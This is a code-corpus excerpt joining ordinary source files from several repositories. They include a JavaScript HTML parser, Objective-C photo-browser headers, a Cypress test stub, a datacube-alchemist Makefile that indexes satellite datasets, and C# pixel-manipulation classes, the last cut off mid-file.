var empty = { area: true, base: true, basefont: true, br: true, col: true, command: true, embed: true, frame: true, hr: true, img: true, input: true, isindex: true, keygen: true, link: true, meta: true, param: true, source: true, track: true, wbr: true };
/**
* Special tags that can contain anything
*/
var special = { script: true, style: true };
/**
* Attributes that autofill
*/
var autofill = { autofocus: true, autoplay: true, async: true, checked: true, controls: true, defer: true, disabled: true, hidden: true, loop: true, multiple: true, open: true, readonly: true, required: true, scoped: true, selected: true }
/**
* Regexs
*/
var rcomment = /^<!--([\s\S]*)-->/;
var rstarttag = /^<([-A-Za-z0-9_]+)((?:\s+\w+(?:\s*=\s*(?:(?:"[^"]*")|(?:'[^']*')|[^>\s]+))?)*)\s*(\/?)>/;
var rattr = /([-A-Za-z0-9_]+)(?:\s*=\s*(?:(?:"((?:\\.|[^"])*)")|(?:'((?:\\.|[^'])*)')|([^>\s]+)))?/g;
var rendtag = /^<\/([-A-Za-z0-9_]+)[^>]*>/;
var rtext = /^[^<]+/;
/**
* Create regex for special tags
*/
var rspecial = {};
for (var tag in special) rspecial[tag] = new RegExp('<\/' + tag + '[^>]*>', 'i');
/**
* Create a new `Parser`
*
* @param {String} html
* @return {Parser}
* @api public
*/
function Parser(html) {
if (!(this instanceof Parser)) return new Parser(html);
if ('string' != typeof html) throw new TypeError('String expected');
this.html = this.original = html;
this.tokens = [];
this.parent = this.root = nodes.fragment();
this.tree = this.parent.childNodes;
this.err = null;
}
/**
* Parse all the nodes
*
* @return {Object|Error} dom
* @api public
*/
Parser.prototype.parse = function() {
while (!this.err && this.advance() != 'eos');
if (this.err) return this.err;
var children = this.root.childNodes;
// one element
if (1 == children.length) {
children[0].parentNode = null;
return children[0];
}
// several elements
return this.root;
}
/**
* Advance to the next token
*
* @return {String} token
* @api public
*/
Parser.prototype.advance = function() {
var tok = this.eos()
|| this.comment()
|| this.endtag()
|| this.starttag()
|| this.text()
|| this.error()
this.tokens.push(tok);
return tok;
}
/**
* Consume the given `len`.
*
* @param {Number|Array} len
* @api private
*/
Parser.prototype.skip = function(len){
this.html = this.html.substr(Array.isArray(len)
? len[0].length
: len);
};
/**
* End of string
*
* @return {String|undefined} token
* @api private
*/
Parser.prototype.eos = function() {
if (!this.html.length) return 'eos';
};
/**
* Comment
*
* @return {String|undefined} token
* @api private
*/
Parser.prototype.comment = function() {
var captures;
if (captures = rcomment.exec(this.html)) {
this.skip(captures);
var node = nodes.comment(captures[1], this.parent);
debug('<!-- %s -->', captures[1]);
// connect it to the DOM
this.connect(node);
return 'comment';
}
};
/**
* Start Tag
*
* @return {String|undefined} token
* @api private
*/
Parser.prototype.starttag = function() {
var captures;
if (captures = rstarttag.exec(this.html)) {
this.skip(captures);
var name = captures[1].toLowerCase();
var attrs = (captures[2]) ? attributes(captures[2]) : {};
var node = nodes.element(name, attrs, this.parent);
debug('<%s>', name)
// connect it to the DOM
this.connect(node);
// handle self-closing tags
// and special tags that can
// contain any content
if (special[name]) {
node = this.special(node);
} else if(!empty[name]) {
this.tree = node.childNodes;
this.parent = node;
}
return 'start-tag';
}
};
/**
* End Tag
*
* @return {String|undefined} token
* @api private
*/
Parser.prototype.endtag = function() {
var captures;
if (captures = rendtag.exec(this.html)) {
this.skip(captures);
debug('</%s>', captures[1]);
// move up a level
this.parent = this.parent.parentNode;
this.tree = this.parent.childNodes;
return 'end-tag';
}
};
/**
* Text Nodes
*
* @return {String|undefined} token
* @api private
*/
Parser.prototype.text = function() {
var captures;
if (captures = rtext.exec(this.html)) {
this.skip(captures);
var node = nodes.text(captures[0], this.parent);
debug(node.nodeValue);
// connect it to the DOM
this.connect(node);
return 'text';
}
};
/**
* Handle special tags (ex. script, style)
* that can contain any content including "<".
*
* @param {Object} node
* @return {Object} node
*/
Parser.prototype.special = function(node) {
var name = node.nodeName.toLowerCase();
var captures = rspecial[name].exec(this.html);
if (!captures) return this.error('No ending ' + name + ' tag.');
// extract the contents of the tag
var text = this.html.slice(0, captures.index);
// connect DOM
var textnode = nodes.text(text, node);
node.childNodes.push(textnode);
// skip text + length of match
this.skip(text.length + captures[0].length);
return node;
};
/**
* Connect the DOM tree
*
* @param {Object} node
* @return {Parser}
* @api private
*/
Parser.prototype.connect = function(node) {
// fetch the previous DOM node
var prev = this.tree[this.tree.length - 1];
// first child
if (!this.tree.length) this.parent.firstChild = node;
// add node to DOM tree
this.tree.push(node);
// last child
this.parent.lastChild = node;
// set previous and next siblings
if (prev) {
prev.nextSibling = node;
node.previousSibling = prev;
}
return this;
}
/**
* Handle errors
*
* @param {String} err (optional)
* @return {String}
* @api private
*/
Parser.prototype.error = function(err) {
var original = this.original;
var ellipsis = '\u2026';
var caret = '\u2038';
var i = original.length - this.html.length;
// provide a useful error
var at = original.slice(i - 20, i) + caret + original.slice(i, i + 20)
at = original[i - 20] ? ellipsis + at : at
at += original[i + 20] ? ellipsis : '';
// add the message
var msg = err || 'Parsing error.';
msg += ' Near: ' + at;
// set the error
this.err = new Error(msg);
return 'error';
};
/**
* Parse attributes
*
* @param {String} str
* @return {Object}
* @api private
*/
function attributes(str) {
var attrs = {};
str.replace(rattr, function(match, name) {
attrs[name] = arguments[2] || arguments[3] || arguments[4] || autofill[name] || '';
});
return attrs;
}
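/**
 * Usage sketch (illustrative addition, not part of the original module):
 * a minimal example of driving the Parser defined above. The sample HTML
 * string and the expected values in the comments are assumptions for
 * demonstration only.
 *
 * @example
 *   var parser = Parser('<ul><li>one</li><li>two</li></ul>');
 *   var dom = parser.parse();                 // a node tree, or an Error on failure
 *   if (dom instanceof Error) throw dom;
 *   dom.nodeName;                             // => 'UL'
 *   dom.childNodes.length;                    // => 2 (the two <li> elements)
 *   dom.firstChild.childNodes[0].nodeValue;   // => 'one'
 */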
<|start_filename|>component.json<|end_filename|>
{
"name": "mini-html-parser",
"repo": "matthewmueller/mini-html-parser",
"description": "mini html parser for webworkers & node",
"version": "0.0.3",
"keywords": [
"html",
"parser"
],
"dependencies": {
"visionmedia/debug": "0.7.4"
},
"development": {},
"license": "MIT",
"main": "index.js",
"scripts": [
"index.js",
"nodes/comment.js",
"nodes/element.js",
"nodes/fragment.js",
"nodes/text.js"
]
}
| matthewmueller/mini-html-parser |
<|start_filename|>PYPhotoBrowser/Controller/PYPhotosReaderController.h<|end_filename|>
// Source code: https://github.com/iphone5solo/PYPhotosView
// Source code: http://code4app.com/thread-8612-1-1.html
// Created by CoderKo1o.
// Copyright © 2016 iphone5solo. All rights reserved.
// Controller for browsing photos (typically used for browsing photos loaded from the network)
#import <UIKit/UIKit.h>
@class PYPhotoView, PYPhotosView, PYPhotoBrowseView;
@interface PYPhotosReaderController : UICollectionViewController
/** Quickly create a photo browser */
+ (instancetype)readerController;
/** Show the photos in the specified window */
- (void)showPhotosToWindow:(PYPhotoBrowseView *)window;
/** Hide the photos */
- (void)hiddenPhoto;
/** The view of the currently selected photo */
@property (nonatomic, weak) PYPhotoView *selectedPhotoView;
/** The copied view */
@property (nonatomic, weak) PYPhotoView *beginView;
@end
<|start_filename|>PYPhotoBrowser/Category/MBProgressHUD+PYExtension.h<|end_filename|>
#if __has_include(<MBProgressHUD/MBProgressHUD.h>)
#import <MBProgressHUD/MBProgressHUD.h>
#else
#import "MBProgressHUD.h"
#endif
@interface MBProgressHUD (PY)
/** Show a success message */
+ (void)py_showSuccess:(NSString *)success toView:(UIView *)view;
/** Show an error message */
+ (void)py_showError:(NSString *)error toView:(UIView *)view;
/** Show a loading message */
+ (void)py_showLoading:(NSString *)loading toView:(UIView *)view;
@end
<|start_filename|>PYPhotoBrowser/Other/PYProgressView.h<|end_filename|>
// Source code: https://github.com/iphone5solo/PYPhotosView
// Source code: http://code4app.com/thread-8612-1-1.html
// Created by CoderKo1o.
// Copyright © 2016 iphone5solo. All rights reserved.
// A subclass of DALabeledCircularProgressView
#if __has_include(<DACircularProgress/DALabeledCircularProgressView.h>)
#import <DACircularProgress/DALabeledCircularProgressView.h>
#else
#import "DALabeledCircularProgressView.h"
#endif
@interface PYProgressView : DALabeledCircularProgressView
/** Set the loading progress */
- (void)py_setProgress:(CGFloat)progress animated:(BOOL)animated;
@end
| jfdream/PYPhotoBrowser |
<|start_filename|>Makefile<|end_filename|>
build-image:
docker build . \
--tag opendatacube/datacube-alchemist:test \
--build-arg ENVIRONMENT=test
build-prod-image:
docker build . \
--tag opendatacube/datacube-alchemist:latest \
--build-arg ENVIRONMENT=deployment
run-prod:
docker run --rm \
opendatacube/datacube-alchemist
test-local:
pytest tests
# Docker Compose environment
build:
docker-compose build
up:
docker-compose up
down:
docker-compose down
shell:
docker-compose exec alchemist bash
test:
docker-compose exec alchemist pytest tests
lint:
docker-compose exec alchemist black --check datacube_alchemist
integration-test:
docker-compose up -d
docker-compose exec -T alchemist bash ./tests/integration_tests.sh
# C3 Related
initdb:
docker-compose exec alchemist \
datacube system init
metadata:
docker-compose exec alchemist \
datacube metadata add https://raw.githubusercontent.com/GeoscienceAustralia/digitalearthau/develop/digitalearthau/config/eo3/eo3_landsat_ard.odc-type.yaml
product:
docker-compose exec alchemist \
datacube product add \
https://raw.githubusercontent.com/GeoscienceAustralia/digitalearthau/develop/digitalearthau/config/eo3/products-aws/ard_ls5.odc-product.yaml \
https://raw.githubusercontent.com/GeoscienceAustralia/digitalearthau/develop/digitalearthau/config/eo3/products-aws/ard_ls7.odc-product.yaml \
https://raw.githubusercontent.com/GeoscienceAustralia/digitalearthau/develop/digitalearthau/config/eo3/products-aws/ard_ls8.odc-product.yaml
index:
docker-compose exec alchemist \
datacube dataset add --ignore-lineage --confirm-ignore-lineage \
s3://dea-public-data/baseline/ga_ls8c_ard_3/098/073/2020/07/19/ga_ls8c_ard_3-1-0_098073_2020-07-19_final.odc-metadata.yaml \
s3://dea-public-data/baseline/ga_ls5t_ard_3/108/083/2010/10/02/ga_ls5t_ard_3-0-0_108083_2010-10-02_final.odc-metadata.yaml \
s3://dea-public-data/baseline/ga_ls7e_ard_3/100/075/2003/10/15/ga_ls7e_ard_3-0-0_100075_2003-10-15_final.odc-metadata.yaml \
s3://dea-public-data/baseline/ga_ls8c_ard_3/091/089/2019/01/20/ga_ls8c_ard_3-0-0_091089_2019-01-20_final.odc-metadata.yaml
# Landsat geomedian
index-geomedian:
docker-compose exec alchemist \
bash -c "\
datacube product add https://data.dea.ga.gov.au/geomedian-australia/v2.1.0/product-definition.yaml;\
s3-to-dc --no-sign-request 's3://dea-public-data/geomedian-australia/v2.1.0/L8/**/*.yaml' ls8_nbart_geomedian_annual\
"
# s2a required for on-the-fly gm calculation
product-s2a:
docker-compose exec alchemist \
datacube product add \
https://raw.githubusercontent.com/GeoscienceAustralia/digitalearthau/develop/digitalearthau/config/eo3/products-aws/s2_ard_granule.odc-product.yaml
index-s2a:
docker-compose exec alchemist \
bash -c "\
s3-to-dc --no-sign-request 's3://dea-public-data/baseline/s2a_ard_granule/**/*.yaml' s2a_ard_granule\
"
# Barest Earth required for NRT calculation
product-s2be:
docker-compose exec alchemist \
datacube product add \
https://explorer.dev.dea.ga.gov.au/products/s2_barest_earth.odc-product.yaml
index-s2be:
docker-compose exec alchemist \
bash -c "\
s3-to-dc --no-sign-request 's3://dea-public-data-dev/s2be/*/*odc-metadata.yaml' s2_barest_earth\
"
# Add s2 c3 datasets
product-s2-c3:
docker-compose exec alchemist \
datacube product add \
https://explorer.dev.dea.ga.gov.au/products/ga_s2am_ard_provisional_3.odc-product.yaml
docker-compose exec alchemist \
datacube product add \
https://explorer.dev.dea.ga.gov.au/products/ga_s2bm_ard_provisional_3.odc-product.yaml
index-s2-c3:
docker-compose exec alchemist \
datacube dataset add --ignore-lineage --confirm-ignore-lineage \
s3://dea-public-data/baseline/ga_s2am_ard_provisional_3/51/KWV/2021/08/18_nrt/20210818T033715/ga_s2am_ard_provisional_3-2-1_51KWV_2021-08-18_nrt.odc-metadata.yaml \
# Specific BE dataset for local testing
index-one-s2be:
docker-compose exec alchemist \
datacube dataset add --ignore-lineage --confirm-ignore-lineage \
https://dea-public-data-dev.s3.ap-southeast-2.amazonaws.com/s2be/s2be-SG5006.odc-metadata.yaml
metadata-s2-nrt:
docker-compose exec alchemist \
datacube metadata add \
https://raw.githubusercontent.com/GeoscienceAustralia/dea-config/master/products/nrt/sentinel/eo_s2_nrt.odc-type.yaml
product-s2-nrt:
docker-compose exec alchemist \
datacube product add \
https://raw.githubusercontent.com/GeoscienceAustralia/dea-config/master/products/nrt/sentinel/s2_nrt.products.yaml
metadata-eo_plus:
docker-compose exec alchemist \
datacube metadata add \
https://raw.githubusercontent.com/opendatacube/datacube-dataset-config/master/metadata_types/eo_plus.odc-type.yaml
index-s2-nrt:
docker-compose exec alchemist \
datacube dataset add --ignore-lineage --confirm-ignore-lineage \
s3://dea-public-data/L2/sentinel-2-nrt/S2MSIARD/2021-05-12/S2B_OPER_MSI_ARD_TL_VGS4_20210512T014256_A021835_T56JKM_N03.00/ARD-METADATA.yaml \
s3://dea-public-data/L2/sentinel-2-nrt/S2MSIARD/2021-05-05/S2B_OPER_MSI_ARD_TL_VGS4_20210506T011341_A021749_T56GMA_N03.00/ARD-METADATA.yaml \
s3://dea-public-data/L2/sentinel-2-nrt/S2MSIARD/2021-05-05/S2A_OPER_MSI_ARD_TL_VGS4_20210505T024121_A030644_T53LRJ_N03.00/ARD-METADATA.yaml \
s3://dea-public-data/L2/sentinel-2-nrt/S2MSIARD/2021-05-18/S2A_OPER_MSI_ARD_TL_VGS4_20210518T025201_A030830_T53KLV_N03.00/ARD-METADATA.yaml \
s3://dea-public-data/L2/sentinel-2-nrt/S2MSIARD/2021-05-16/S2A_OPER_MSI_ARD_TL_VGS1_20210516T054329_A030802_T50JMS_N03.00/ARD-METADATA.yaml \
s3://dea-public-data/L2/sentinel-2-nrt/S2MSIARD/2021-06-18/S2A_OPER_MSI_ARD_TL_VGS4_20210618T022813_A031273_T54LXJ_N03.00/ARD-METADATA.yaml \
s3://dea-public-data/L2/sentinel-2-nrt/S2MSIARD/2021-06-20/S2B_OPER_MSI_ARD_TL_VGS4_20210620T015752_A022393_T55LBC_N03.00/ARD-METADATA.yaml \
s3://dea-public-data/L2/sentinel-2-nrt/S2MSIARD/2021-07-02/S2B_OPER_MSI_ARD_TL_VGS1_20210702T024204_A022565_T53KNT_N03.01/ARD-METADATA.yaml \
s3://dea-public-data/L2/sentinel-2-nrt/S2MSIARD/2021-07-07/S2B_OPER_MSI_ARD_TL_VGS1_20210707T014852_A022636_T54HWC_N03.01/ARD-METADATA.yaml \
s3://dea-public-data/L2/sentinel-2-nrt/S2MSIARD/2021-07-08/S2A_OPER_MSI_ARD_TL_VGS4_20210708T022548_A031559_T54HTJ_N03.01/ARD-METADATA.yaml \
s3://dea-public-data/L2/sentinel-2-nrt/S2MSIARD/2021-07-03/S2A_OPER_MSI_ARD_TL_VGS4_20210703T013119_A031487_T55HFB_N03.01/ARD-METADATA.yaml \
s3://dea-public-data/L2/sentinel-2-nrt/S2MSIARD/2021-07-31/S2B_OPER_MSI_ARD_TL_VGS4_20210731T011212_A022979_T56JKT_N03.01/ARD-METADATA.yaml \
s3://dea-public-data/L2/sentinel-2-nrt/S2MSIARD/2021-08-05/S2A_OPER_MSI_ARD_TL_VGS4_20210805T013351_A031959_T56JKT_N03.01/ARD-METADATA.yaml
metadata-s2-c3-prov:
docker-compose exec alchemist \
datacube metadata add \
https://raw.githubusercontent.com/GeoscienceAustralia/dea-config/master/products/nrt/sentinel/eo_s2_nrt.odc-type.yaml
product-s2-c3-prov:
docker-compose exec alchemist \
datacube product add \
https://raw.githubusercontent.com/GeoscienceAustralia/digitalearthau/develop/digitalearthau/config/eo3/products-aws/ard_s2a_provisional.odc-product.yaml
docker-compose exec alchemist \
datacube product add \
https://raw.githubusercontent.com/GeoscienceAustralia/digitalearthau/develop/digitalearthau/config/eo3/products-aws/ard_s2b_provisional.odc-product.yaml
index-s2-c3-prov:
docker-compose exec alchemist \
datacube dataset add --ignore-lineage --confirm-ignore-lineage \
s3://dea-public-data/baseline/ga_s2bm_ard_provisional_3/51/KWR/2021/09/02_nrt/20210902T033620/ga_s2bm_ard_provisional_3-2-1_51KWR_2021-09-02_nrt.odc-metadata.yaml \
quickstart: initdb metadata product index index-geomedian metadata-s2-nrt product-s2-nrt metadata-eo_plus index-s2-nrt product-s2be index-s2be product-s2-c3
index-ba-bm-s2:
docker-compose exec alchemist \
datacube dataset add --ignore-lineage --confirm-ignore-lineage \
s3://dea-public-data/derivative/ga_s2_ba_bm_3/1-6-0/54/HVE/2021/07/22/20210722T015557/ga_s2_ba_bm_3_54HVE_2021-07-22_interim.odc-metadata.yaml
# Landsat 8, 7 and 5 respectively
THREE_SCENES=600645a5-5256-4632-a13d-fa13d1c11a8f 8b215983-ae1b-45bd-ad63-7245248bd41b 3fda2741-e810-4d3e-a54a-279fc3cd795f
wofs-one:
docker-compose exec alchemist \
datacube-alchemist run-one --config-file ./examples/c3_config_wo.yaml \
--uuid 600645a5-5256-4632-a13d-fa13d1c11a8f
wofs-many:
docker-compose exec alchemist \
datacube-alchemist run-many --config-file ./examples/c3_config_wo.yaml --limit=2 \
time in 2020-01
fc-one:
docker-compose exec alchemist \
datacube-alchemist run-one --config-file ./examples/c3_config_fc.yaml \
--uuid 600645a5-5256-4632-a13d-fa13d1c11a8f
ard-c2-one:
docker-compose exec alchemist \
datacube-alchemist run-one --config-file ./examples/config_ba_L3_ARD_provisional.yaml \
--uuid 3e846ef0-5e7a-402e-b1a0-27e319ca78da
ard-c3-one:
docker-compose exec alchemist \
datacube-alchemist run-one --config-file ./examples/config_ba_C2_ARD_provisional.yaml \
--uuid 5c70a4a2-cf36-4779-92a8-b35b8039cb0a
bai-one:
docker-compose exec alchemist \
datacube-alchemist run-one --config-file ./examples/c3_config_bai_s2be.yaml \
--uuid 8ed63ad1-875e-4823-87f4-8431bbd1e899
wofs-one-of-each:
docker-compose exec alchemist \
bash -c \
"echo '${THREE_SCENES}' | xargs -n1 datacube-alchemist run-one ./examples/c3_config_wo.yaml"
fc-one-of-each:
docker-compose exec alchemist \
bash -c \
"echo '${THREE_SCENES}' | xargs -n1 datacube-alchemist run-one ./examples/c3_config_fc.yaml"
find_missing:
docker-compose exec alchemist \
datacube-alchemist add-missing-to-queue --config-file ./examples/c3_config_wo.yaml \
--queue alex-dev-alive \
--dryrun
# Africa Examples
product-africa:
docker-compose exec alchemist \
datacube product add \
https://raw.githubusercontent.com/digitalearthafrica/config/master/products/ls8_sr.odc-product.yaml \
https://raw.githubusercontent.com/digitalearthafrica/config/master/products/ls7_sr.odc-product.yaml \
https://raw.githubusercontent.com/digitalearthafrica/config/master/products/ls5_sr.odc-product.yaml
index-africa:
docker-compose exec --env AWS_DEFAULT_REGION=af-south-1 alchemist \
bash -c "\
s3-to-dc --stac --no-sign-request \
s3://deafrica-landsat/collection02/level-2/standard/oli-tirs/2017/160/071/LC08_L2SP_160071_20170830_20200903_02_T1/*SR_stac.json \
ls8_sr && \
s3-to-dc --stac --no-sign-request \
s3://deafrica-landsat/collection02/level-2/standard/etm/2021/170/052/LE07_L2SP_170052_20210316_20210412_02_T1/*_SR_stac.json \
ls7_sr && \
s3-to-dc --stac --no-sign-request \
s3://deafrica-landsat/collection02/level-2/standard/tm/1994/176/044/LT05_L2SP_176044_19940714_20210402_02_T1/*_SR_stac.json \
ls5_sr"
wo-africa-one:
docker-compose exec \
--env AWS_DEFAULT_REGION=af-south-1 \
--env AWS_S3_ENDPOINT=s3.af-south-1.amazonaws.com \
alchemist \
datacube-alchemist run-one --config-file ./examples/wofs_ls.alchemist.yaml \
--uuid 1f88087d-0da6-55be-aafb-5e370520e405
fc-africa-one:
docker-compose exec \
--env AWS_DEFAULT_REGION=af-south-1 \
--env AWS_S3_ENDPOINT=s3.af-south-1.amazonaws.com \
alchemist \
datacube-alchemist run-one --config-file ./examples/fc_ls.alchemist.yaml \
--uuid 1f88087d-0da6-55be-aafb-5e370520e405
THREE_AFRICA=1f88087d-0da6-55be-aafb-5e370520e405 272c298f-03e3-5a08-a584-41a0a3c3cb95 834d56e2-7465-5980-a6af-615ef0f67e28
wo-africa-three:
docker-compose exec \
--env AWS_DEFAULT_REGION=af-south-1 \
--env AWS_S3_ENDPOINT=s3.af-south-1.amazonaws.com \
alchemist bash -c\
"echo '${THREE_AFRICA}' | \
xargs -n1 datacube-alchemist run-one --config-file ./examples/wofs_ls.alchemist.yaml --uuid \
"
fc-africa-three:
docker-compose exec \
--env AWS_DEFAULT_REGION=af-south-1 \
--env AWS_S3_ENDPOINT=s3.af-south-1.amazonaws.com \
alchemist bash -c\
"echo '${THREE_AFRICA}' | \
xargs -n1 datacube-alchemist run-one --config-file ./examples/fc_ls.alchemist.yaml --uuid \
"
# Queue testing
wofs-to-queue:
docker-compose exec alchemist \
datacube-alchemist add-to-queue --config-file ./examples/c3_config_wo.yaml --queue alex-dev-alive \
--limit=300 --product-limit=100
wofs-from-queue:
docker-compose exec alchemist \
datacube-alchemist run-from-queue --config-file ./examples/c3_config_wo.yaml --queue alex-dev-alive \
--limit=1 --queue-timeout=600 --dryrun
fc-to-queue:
docker-compose exec alchemist \
datacube-alchemist add-to-queue --config-file ./examples/c3_config_fc.yaml --queue alex-dev-alive \
--limit=20 --product-limit=5
fc-from-queue:
docker-compose exec alchemist \
datacube-alchemist run-from-queue --config-file ./examples/c3_config_fc.yaml --queue alex-dev-alive \
--limit=1 --queue-timeout=1200
fc-deadletter:
docker-compose exec alchemist \
datacube-alchemist run-from-queue --config-file ./examples/c3_config_fc.yaml \
--queue dea-dev-eks-alchemist-c3-processing-fc-deadletter \
--queue-timeout=1200
wo-deadletter:
docker-compose exec alchemist \
datacube-alchemist run-from-queue --config-file ./examples/c3_config_wo.yaml \
--queue dea-dev-eks-alchemist-c3-processing-wo-deadletter \
--queue-timeout=1200
| erin-telfer/datacube-alchemist |
<|start_filename|>platform/viewer/cypress/integration/visual-regression/PercyCheckOHIFRoutes.spec.js<|end_filename|>
// We excluded tests for '**/studies/**' because most (if not all) of our other study/viewer tests already exercise this route
describe('Visual Regression - OHIF Routes', function() {
beforeEach(function() {
cy.openStudyList();
});
/*
// TODO -> Bring back when testJSON is hosted again.
it('checks TEST json url study route', function() {
cy.visit(
'/viewer?url=https://ohif-viewer.s3.eu-central-1.amazonaws.com/JSON/testJSON.json'
);
cy.server();
cy.route('GET', '**/ TESTStudy; /**').as('getTESTStudy');
cy.wait('@getTESTStudy.all');
cy.get('@getTESTStudy').should($route => {
expect($route.status).to.be.eq(200);
});
cy.percyCanvasSnapshot('TEST json study route');
});
*/
});
| zhjfu/Viewers |
<|start_filename|>src/structures/ProductMetadata.js<|end_filename|>
const Base = require('./Base');
class ProductMetadata extends Base {
constructor(client, data) {
super(client);
if (data) this._patch(data);
}
_patch(data) {
/** Product ID */
this.id = data.id;
/** Retailer ID */
this.retailer_id = data.retailer_id;
/** Product Name */
this.name = data.name;
/** Product Description */
this.description = data.description;
return super._patch(data);
}
}
module.exports = ProductMetadata;
| BagasNS/whatsapp-web.js
<|start_filename|>PixelMap/Pixel.cs<|end_filename|>
using System;
using System.CodeDom;
using System.Collections.Generic;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace PixelMapSharp
{
public struct Pixel
{
/// <summary>
/// Creates a pixel from a System.Drawing color.</summary>
public Pixel(Color c)
{
A = c.A;
R = c.R;
G = c.G;
B = c.B;
}
/// <summary>
/// Creates a pixel from integer RGB values.</summary>
public Pixel(int r, int g, int b) : this((byte)r, (byte)g, (byte)b) { }
/// <summary>
/// Creates a pixel from ARGB values.</summary>
public Pixel(int a, int r, int g, int b) : this((byte)a, (byte)r, (byte)g, (byte)b) { }
/// <summary>
/// Creates a pixel from RGB values.</summary>
public Pixel(byte r, byte g, byte b)
{
A = 255;
R = r;
G = g;
B = b;
}
/// <summary>
/// Creates a pixel from ARGB values.</summary>
public Pixel(byte a, byte r, byte g, byte b)
{
A = a;
R = r;
G = g;
B = b;
}
/// <summary>
/// Creates a pixel from HSL-A values.</summary>
public Pixel(double hue, double saturation, double lightness, byte alpha)
{
lightness %= 1;
saturation %= 1;
double q = lightness < 0.5 ? lightness * (1 + saturation) : lightness + saturation - lightness * saturation;
double p = 2 * lightness - q;
hue %= 360;
hue /= 360f;
double r = hueToRGB(p, q, hue + 1 / 3f);
double g = hueToRGB(p, q, hue);
double b = hueToRGB(p, q, hue - 1 / 3f);
A = alpha;
R = window(r * 255);
G = window(g * 255);
B = window(b * 255);
}
/// <summary>
/// Creates a pixel from HSL values.</summary>
public Pixel(double hue, double saturation, double lightness)
: this(hue, saturation, lightness, 255)
{ }
private static double hueToRGB(double p, double q, double t)
{
if (t < 0) t += 1;
if (t > 1) t -= 1;
if (t < 1 / 6f) return p + (q - p) * 6 * t;
if (t < 1 / 2f) return q;
if (t < 2 / 3f) return p + (q - p) * (2 / 3f - t) * 6;
return p;
}
private static byte window(double c)
{
return (byte)Math.Min(Math.Max(0, c), 255);
}
/// <summary>
/// The alpha value of the Pixel from 0 to 255.</summary>
public byte A;
/// <summary>
/// The red value of the Pixel from 0 to 255.</summary>
public byte R;
/// <summary>
/// The green value of the Pixel from 0 to 255.</summary>
public byte G;
/// <summary>
/// The blue value of the Pixel from 0 to 255.</summary>
public byte B;
/// <summary>
/// The alpha value of the Pixel from 0 to 1.</summary>
public double AValue { get { return A / 255d; } set { A = (byte)(value * 255d); } }
/// <summary>
/// The red value of the Pixel from 0 to 1.</summary>
public double RValue { get { return R / 255d; } set { R = (byte)(value * 255d); } }
/// <summary>
/// The green value of the Pixel from 0 to 1.</summary>
public double GValue { get { return G / 255d; } set { G = (byte)(value * 255d); } }
/// <summary>
/// The blue value of the Pixel from 0 to 1.</summary>
public double BValue { get { return B / 255d; } set { B = (byte)(value * 255d); } }
/// <summary>
/// The Hue value of the Pixel, radially spanning from 0 to 360 degrees.</summary>
public double Hue
{
get
{
double r = R / 255.0f;
double g = G / 255.0f;
double b = B / 255.0f;
double max = r;
double min = r;
if (g > max) max = g;
if (b > max) max = b;
if (g < min) min = g;
if (b < min) min = b;
double delta = max - min;
double hue = 0.0f;
if (r == max)
{
hue = (g - b) / delta;
}
else if (g == max)
{
hue = 2 + (b - r) / delta;
}
else if (b == max)
{
hue = 4 + (r - g) / delta;
}
hue *= 60;
if (hue < 0.0f)
{
hue += 360.0f;
}
if (double.IsNaN(hue))
return 0;
return hue;
}
set
{
this = new Pixel(value, Saturation, Lightness, A);
}
}
/// <summary>
/// The saturation value of the Pixel.</summary>
public double Saturation
{
get
{
double r = R / 255.0f;
double g = G / 255.0f;
double b = B / 255.0f;
double l;
double s = 0;
double max = r;
double min = r;
if (g > max) max = g;
if (b > max) max = b;
if (g < min) min = g;
if (b < min) min = b;
// if max == min, then there is no color and
// the saturation is zero.
if (max != min)
{
l = (max + min) / 2;
if (l <= .5)
{
s = (max - min) / (max + min);
}
else
{
s = (max - min) / (2 - max - min);
}
}
return s;
}
set
{
this = new Pixel(Hue, value, Lightness, A);
}
}
/// <summary>
/// The lightness value of the Pixel.</summary>
public double Lightness
{
get
{
double r = R / 255.0f;
double g = G / 255.0f;
double b = B / 255.0f;
double max = r;
double min = r;
if (g > max) max = g;
if (b > max) max = b;
if (g < min) min = g;
if (b < min) min = b;
return (max + min) / 2;
}
set
{
this = new Pixel(Hue, Saturation, value, A);
}
}
/// <summary>
/// The GDI color equivalent.</summary>
public Color Color
{
get { return Color.FromArgb(A, R, G, B); }
set { this = new Pixel(value.A, value.R, value.G, value.B); }
}
/// <summary>
/// Additive mix of two pixels.</summary>
public static Pixel operator +(Pixel a, Pixel b)
{
return new Pixel(
(byte)((a.AValue / 2 + b.AValue / 2) * 255),
(byte)((a.RValue / 2 + b.RValue / 2) * 255),
(byte)((a.GValue / 2 + b.GValue / 2) * 255),
(byte)((a.BValue / 2 + b.BValue / 2) * 255));
}
/// <summary>
/// Multiplicative mix of two pixels.</summary>
public static Pixel operator *(Pixel a, Pixel b)
{
return new Pixel(
(byte)((a.AValue * b.AValue) * 255),
(byte)((a.RValue * b.RValue) * 255),
(byte)((a.GValue * b.GValue) * 255),
(byte)((a.BValue * b.BValue) * 255));
}
/// <summary>
/// Difference mix of two pixels.</summary>
public static Pixel operator -(Pixel a, Pixel b)
{
return new Pixel(
(byte)(Math.Abs(a.AValue / 2 - b.AValue / 2) * 255),
(byte)(Math.Abs(a.RValue / 2 - b.RValue / 2) * 255),
(byte)(Math.Abs(a.GValue / 2 - b.GValue / 2) * 255),
(byte)(Math.Abs(a.BValue / 2 - b.BValue / 2) * 255));
}
}
}
<|start_filename|>PixelMapSamples/Program.cs<|end_filename|>
using System;
using System.Collections.Generic;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using PixelMapSharp;
namespace PixelMapSamples
{
class Program
{
static void Main(string[] args)
{
//Quickly load a PixelMap through a Bitmap
PixelMap map = new PixelMap("Lenna.png");
for (int x = 0; x < map.Width; x++)
{
for (int y = 0; y < map.Height; y++)
{
//Sample a pixel
Pixel pixel = map[x, y];
//Create a hue value
double value = ((double)x / map.Width) * 360d;
//Set the hue value to our sample
pixel.Hue = value;
//Return our sample to the PixelMap
map[x, y] = pixel;
}
}
//Save the PixelMap through a Bitmap
map.GetBitmap().Save("output.png");
}
}
}
<|start_filename|>PixelMap/PixelMap.cs<|end_filename|>
using System;
using System.Collections.Generic;
using System.Drawing;
using System.Drawing.Imaging;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace PixelMapSharp
{
/// <summary>
/// A container of mutable pixel data.</summary>
public class PixelMap
{
/// <summary>
/// Creates a blank PixelMap of desired width and height.</summary>
public PixelMap(int width, int height)
{
Width = width;
Height = height;
map = new Pixel[Width, Height];
